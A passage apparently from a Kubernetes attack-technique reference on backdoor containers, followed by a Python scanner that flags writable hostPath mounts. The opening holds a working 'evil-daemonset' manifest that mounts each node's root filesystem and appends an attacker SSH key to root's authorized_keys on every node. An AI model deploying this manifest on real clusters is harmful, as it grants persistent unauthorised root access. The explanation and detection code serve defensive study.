Attackers run their malicious code in a container in the cluster. By using Kubernetes controllers such as DaemonSets or Deployments, attackers can ensure that a constant number of containers run on one, or all, of the nodes in the cluster.
One of the simplest and at the same time most efficient ways to deploy backdoor containers is to use a DaemonSet. The following adds the attacker's SSH key to the authorized_keys file on every node in the cluster every 10 minutes (600 seconds). Because a DaemonSet automatically ensures that a pod runs on each node, newly added nodes are also compromised as soon as they become available.
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: evil-daemonset
  labels:
    app: evil-daemonset
spec:
  selector:
    matchLabels:
      app: evil-daemonset
  template:
    metadata:
      labels:
        app: evil-daemonset
    spec:
      containers:
      - name: evil
        image: ubuntu
        command: [ "/bin/sh", "-c", "mkdir -p /host/root/.ssh && echo 'ssh-rsa AAAAB3NzaC1y...CUkwfwh+iSTP' >> /host/root/.ssh/authorized_keys && sleep 600" ]
        volumeMounts:
        - name: host
          mountPath: /host
      volumes:
      - name: host
        hostPath:
          path: /
Please note that this is a quick and dirty example made for demonstration purposes only: each time the container exits after its 600-second sleep, the DaemonSet restarts it and the key is appended again, so the authorized_keys file fills up with duplicate entries over time.
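From the defender's side, the property that makes this DaemonSet work is visible in the manifest itself: a writable hostPath volume rooted at / mounted into a container, wrapped in a controller that places it on every node. The following scanner is an added example, not code from the original page: it takes the JSON/dict form of a Kubernetes object (as returned by the API server or found in an audit event's requestObject), reports writable hostPath mounts that expose sensitive host directories, and translates paths referenced in the container command back to their location on the node. The SENSITIVE_HOST_PATHS list and the sample manifests are constructed for this example; the sample DaemonSet mirrors the one above with the key replaced by a placeholder.

```python
"""Scan Kubernetes objects for containers that mount sensitive host paths.

Added example, not code from the original page. Works on the dict form of a
Kubernetes object (API response or audit-log requestObject). The sensitive-path
list and the sample manifests below are constructed for this example.
"""
import posixpath
import re
from typing import Dict, List, Optional

# Host directories whose exposure through a writable container mount is a finding.
# Assumed list for this example; extend it for your environment.
SENSITIVE_HOST_PATHS = ("/", "/root", "/home", "/etc", "/var/lib/kubelet",
                        "/var/run/docker.sock", "/run/containerd")

# Controllers that carry a pod template under spec.template (CronJob nests deeper).
TEMPLATE_KINDS = {"DaemonSet", "Deployment", "StatefulSet", "ReplicaSet", "Job"}


def pod_spec_of(obj: Dict) -> Dict:
    """Return the PodSpec regardless of which controller kind wraps it."""
    kind = obj.get("kind")
    if kind == "Pod":
        return obj.get("spec", {})
    if kind == "CronJob":
        return obj["spec"]["jobTemplate"]["spec"]["template"]["spec"]
    if kind in TEMPLATE_KINDS:
        return obj["spec"]["template"]["spec"]
    return {}


def covers(host_path: str, sensitive: str) -> bool:
    """True if host_path is the sensitive directory or one of its parents
    (mounting / exposes /root; mounting /var/lib exposes /var/lib/kubelet)."""
    hp = host_path.rstrip("/") or "/"
    s = sensitive.rstrip("/") or "/"
    return hp == "/" or s == hp or s.startswith(hp + "/")


def translate_to_host(mount_path: str, host_path: str, container_path: str) -> Optional[str]:
    """Map a path seen inside the container to its path on the node,
    or None if it does not lie under the mount."""
    mp = mount_path.rstrip("/")
    if container_path != mp and not container_path.startswith(mp + "/"):
        return None
    rel = container_path[len(mp):].lstrip("/")
    return posixpath.join(host_path, rel) if rel else host_path


def host_paths_in_command(container: Dict, mount_path: str, host_path: str) -> List[str]:
    """Collect paths under the mount that appear in command/args and return them
    as node paths, so a responder sees what the container touches on the host."""
    mp = mount_path.rstrip("/")
    if not mp:
        return []
    text = " ".join(container.get("command", []) + container.get("args", []))
    token = re.compile(re.escape(mp) + r"(?:/[^\s'\"&|;()<>]*)?")
    found = {translate_to_host(mount_path, host_path, m.group(0)) for m in token.finditer(text)}
    return sorted(p for p in found if p)


def find_hostpath_risks(obj: Dict) -> List[Dict]:
    """Return one finding per writable container mount of a sensitive host path."""
    spec = pod_spec_of(obj)
    host_vols = {v["name"]: v["hostPath"]["path"]
                 for v in spec.get("volumes", []) if "hostPath" in v}
    findings = []
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        for m in c.get("volumeMounts", []):
            hp = host_vols.get(m["name"])
            if hp is None or m.get("readOnly", False):
                continue
            if not any(covers(hp, s) for s in SENSITIVE_HOST_PATHS):
                continue
            findings.append({
                "kind": obj.get("kind"),
                "name": obj.get("metadata", {}).get("name"),
                "container": c["name"],
                "host_path": hp,
                "mount_path": m["mountPath"],
                # A DaemonSet lands the mount on every node, current and future.
                "every_node": obj.get("kind") == "DaemonSet",
                "host_targets": host_paths_in_command(c, m["mountPath"], hp),
            })
    return findings


# Constructed sample mirroring the page's DaemonSet; the key is a placeholder.
SAMPLE_DAEMONSET = {
    "apiVersion": "apps/v1", "kind": "DaemonSet",
    "metadata": {"name": "evil-daemonset"},
    "spec": {"selector": {"matchLabels": {"app": "evil-daemonset"}},
             "template": {"metadata": {"labels": {"app": "evil-daemonset"}},
                          "spec": {"containers": [{
                              "name": "evil", "image": "ubuntu",
                              "command": ["/bin/sh", "-c",
                                          "mkdir -p /host/root/.ssh && echo '<PLACEHOLDER-KEY>' "
                                          ">> /host/root/.ssh/authorized_keys && sleep 600"],
                              "volumeMounts": [{"name": "host", "mountPath": "/host"}]}],
                                   "volumes": [{"name": "host", "hostPath": {"path": "/"}}]}}}}

# Constructed benign sample: emptyDir plus a read-only log mount, no finding expected.
BENIGN_DEPLOYMENT = {
    "apiVersion": "apps/v1", "kind": "Deployment", "metadata": {"name": "web"},
    "spec": {"template": {"spec": {
        "containers": [{"name": "web", "image": "nginx",
                        "volumeMounts": [{"name": "cache", "mountPath": "/cache"},
                                         {"name": "logs", "mountPath": "/logs", "readOnly": True}]}],
        "volumes": [{"name": "cache", "emptyDir": {}},
                    {"name": "logs", "hostPath": {"path": "/var/log"}}]}}}}

if __name__ == "__main__":
    for finding in find_hostpath_risks(SAMPLE_DAEMONSET) + find_hostpath_risks(BENIGN_DEPLOYMENT):
        print(finding)
```

Run against live objects by feeding it `kubectl get daemonsets -A -o json` items or the requestObject of `create`/`update` audit events; a finding with `every_node` set and `host_targets` under /root or /home is exactly the pattern above. The same check expressed as an admission policy (rejecting hostPath volumes outside an allow-list) prevents the DaemonSet from being created in the first place.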